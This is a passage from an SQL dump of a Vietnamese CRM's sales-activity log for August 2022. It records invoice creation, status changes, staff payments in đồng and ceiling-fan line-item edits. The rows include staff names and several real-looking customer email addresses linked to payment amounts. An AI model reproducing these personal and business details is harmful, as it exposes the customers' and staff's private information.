1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:42:20'),
(791, 'invoice', 144, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:54:59'),
(792, 'invoice', 145, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:04:12'),
(793, 'invoice', 146, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:08:24'),
(794, 'invoice', 147, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:21:16'),
(795, 'invoice', 148, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:34:02'),
(796, 'invoice', 146, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"10900000.00\";i:1;s:8:\"25255000\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:41:48'),
(797, 'invoice', 148, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:42:34'),
(798, 'invoice', 148, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"9.130.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/140\" target=\"_blank\">#140</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:42:34'),
(799, 'invoice', 144, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:43:37'),
(800, 'invoice', 144, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"54.178.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/141\" target=\"_blank\">#141</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:43:37'),
(801, 'invoice', 144, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:22:\"hien.vo@alliancevn.com\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:43:43'),
(802, 'invoice', 146, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:45:56'),
(803, 'invoice', 146, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"137.995.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/142\" target=\"_blank\">#142</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:45:56'),
(804, 'invoice', 146, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"14.355.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/143\" target=\"_blank\">#143</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:47:00'),
(805, 'invoice', 146, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"25255000.00\";i:1;s:8:\"23950000\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:52:34'),
(806, 'invoice', 146, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:53:49'),
(807, 'invoice', 146, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"137.995.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/144\" target=\"_blank\">#144</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:53:49'),
(808, 'invoice', 137, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:57:52'),
(809, 'invoice', 137, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.875.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/145\" target=\"_blank\">#145</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 11:57:52'),
(810, 'invoice', 146, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:54:\"Bao gồm chi phí phát sinh nhân công lắp đặt\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 12:42:21'),
(811, 'invoice', 147, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 13:40:19'),
(812, 'invoice', 147, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"40.300.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/146\" target=\"_blank\">#146</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 13:40:19'),
(813, 'invoice', 145, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 13:41:50'),
(814, 'invoice', 145, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"130.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/147\" target=\"_blank\">#147</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 13:41:50'),
(815, 'invoice', 145, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:15:\"info@savimec.vn\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 13:41:55'),
(816, 'invoice', 149, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 13:50:58'),
(817, 'invoice', 150, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 13:53:33'),
(818, 'invoice', 151, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 13:57:12'),
(819, 'invoice', 152, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:40:07'),
(820, 'invoice', 153, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:42:49'),
(821, 'invoice', 153, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:43:09'),
(822, 'invoice', 153, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"57.530.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/148\" target=\"_blank\">#148</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:43:09'),
(823, 'invoice', 153, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:48:16'),
(824, 'invoice', 153, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:47:\"Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut\";i:1;s:5:\"10.00\";i:2;s:5:\"11.00\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:48:16'),
(825, 'invoice', 153, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:48:16'),
(826, 'invoice', 153, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:49:30'),
(827, 'invoice', 153, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.753.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/149\" target=\"_blank\">#149</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:49:30'),
(828, 'invoice', 92, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:50:49'),
(829, 'invoice', 154, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 14:59:14'),
(830, 'invoice', 154, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:21:42');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(831, 'invoice', 154, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"21.834.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/150\" target=\"_blank\">#150</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:21:42'),
(832, 'invoice', 154, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:23:01'),
(833, 'invoice', 154, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"18.195.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/151\" target=\"_blank\">#151</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:23:01'),
(834, 'invoice', 152, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:37:\"Quạt trần cánh lớn Essence 3m \";i:1;s:36:\"Quạt trần cánh lớn Essence 3m\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:24:22'),
(835, 'invoice', 152, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:24:32'),
(836, 'invoice', 152, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"151.525.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/152\" target=\"_blank\">#152</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:24:32'),
(837, 'invoice', 151, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:25:35'),
(838, 'invoice', 151, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"9.585.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/153\" target=\"_blank\">#153</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:25:35'),
(839, 'invoice', 150, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:27:15'),
(840, 'invoice', 150, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.312.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/154\" target=\"_blank\">#154</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:27:15'),
(841, 'invoice', 150, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:15:\"nga.do@mepac.vn\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:27:20'),
(842, 'invoice', 149, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:29:02'),
(843, 'invoice', 149, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"11.990.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/155\" target=\"_blank\">#155</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:29:02'),
(844, 'invoice', 149, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:15:\"nga.do@mepac.vn\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:29:08'),
(845, 'invoice', 141, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:30:45'),
(846, 'invoice', 141, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"21.345.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/156\" target=\"_blank\">#156</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:30:45'),
(847, 'invoice', 111, 'invoice_activity_marked_as_cancelled', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:31:54'),
(848, 'invoice', 92, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:34:36'),
(849, 'invoice', 92, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"350.193.955 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/157\" target=\"_blank\">#157</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 15:34:36'),
(850, 'estimate', 85, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-03 09:13:26'),
(851, 'invoice', 155, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-03 13:46:19'),
(852, 'invoice', 155, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-03 13:46:46'),
(853, 'invoice', 155, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.260.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/158\" target=\"_blank\">#158</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-03 13:46:46'),
(854, 'estimate', 86, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-05 17:19:38'),
(855, 'estimate', 86, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:714:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Maple Wood (Màu gỗ sáng - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-05 17:22:38'),
(856, 'invoice', 156, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-05 18:02:11'),
(857, 'estimate', 86, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/156\">INV-DRAFT</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-05 18:02:11'),
(858, 'invoice', 156, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-05 18:02:17'),
(859, 'invoice', 156, 'invoice_activity_marked_as_sent', 'a:0:{}', '6', 'Mỹ Anh Nguyễn', '2022-08-05 18:02:17'),
(860, 'invoice', 157, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-06 11:08:50'),
(861, 'invoice', 157, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-06 11:08:50'),
(862, 'invoice', 158, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-08 12:08:59'),
(863, 'invoice', 158, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-08 12:13:27'),
(864, 'invoice', 158, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"20.720.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/159\" target=\"_blank\">#159</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-08 12:13:27'),
(865, 'invoice', 156, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-08 12:55:55'),
(866, 'invoice', 156, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.836.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/160\" target=\"_blank\">#160</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-08 12:55:55'),
(867, 'estimate', 87, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-08-12 15:48:20'),
(868, 'invoice', 159, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-08-12 15:48:40'),
(869, 'estimate', 87, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/159\">INV-155-22</a>\";}', '1', 'Ho Gia Phat', '2022-08-12 15:48:40'),
(870, 'invoice', 160, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-08-13 12:54:23'),
(871, 'invoice', 160, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-08-13 12:56:10'),
(872, 'invoice', 160, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/161\" target=\"_blank\">#161</a>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-08-13 12:56:10'),
(873, 'invoice', 160, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:714:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Maple wood (Màu gỗ sáng - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-08-13 14:20:18'),
(874, 'estimate', 87, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-14 09:43:49'),
(875, 'invoice', 151, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-15 11:24:47'),
(876, 'invoice', 161, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-08-17 10:02:43'),
(877, 'invoice', 124, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-17 13:00:41'),
(878, 'invoice', 124, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"52.313.100 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/162\" target=\"_blank\">#162</a>\";}', '1', 'Ho Gia Phat', '2022-08-17 13:00:41'),
(879, 'invoice', 159, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:36:\"Quạt trần SINO LED 52 White Wood\";}', '1', 'Ho Gia Phat', '2022-08-17 14:54:27'),
(880, 'invoice', 159, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:49:\"Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood\";}', '1', 'Ho Gia Phat', '2022-08-17 14:54:27'),
(881, 'invoice', 136, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-17 16:26:29'),
(882, 'invoice', 136, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.290.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/163\" target=\"_blank\">#163</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-17 16:26:29'),
(883, 'invoice', 162, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-18 11:11:29'),
(884, 'invoice', 162, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-18 11:12:48'),
(885, 'invoice', 162, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"61.065.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/164\" target=\"_blank\">#164</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-18 11:12:48'),
(886, 'invoice', 162, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:43:\"Quạt gắn tường công nghiệp AirEye\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-18 11:15:09'),
(887, 'invoice', 162, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:43:\"Quạt gắn tường công nghiệp AirEye\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-18 11:15:09'),
(888, 'invoice', 162, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"45000000.00\";i:1;s:8:\"61065000\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-18 11:15:36'),
(889, 'invoice', 163, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-18 14:12:39'),
(890, 'invoice', 151, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-18 16:12:08'),
(891, 'invoice', 151, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"21.600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/165\" target=\"_blank\">#165</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-18 16:12:08'),
(892, 'invoice', 124, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-18 16:49:40'),
(893, 'invoice', 124, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"162\";i:1;s:13:\"52.313.100 đ\";}', '1', 'Ho Gia Phat', '2022-08-18 16:49:40'),
(894, 'invoice', 141, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-18 17:15:56'),
(895, 'invoice', 141, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"25.614.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/166\" target=\"_blank\">#166</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-18 17:15:56'),
(896, 'invoice', 164, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-08-19 10:05:29'),
(897, 'invoice', 165, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-19 11:08:49'),
(898, 'estimate', 87, 'estimate_activity_client_accepted_and_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/165\">INV-160-22</a>\";}', NULL, '', '2022-08-19 11:08:49'),
(899, 'invoice', 165, 'invoice_activity_marked_as_cancelled', '', '6', 'Mỹ Anh Nguyễn', '2022-08-19 11:09:08'),
(900, 'invoice', 165, 'invoice_activity_unmarked_as_cancelled', '', '6', 'Mỹ Anh Nguyễn', '2022-08-19 11:10:32'),
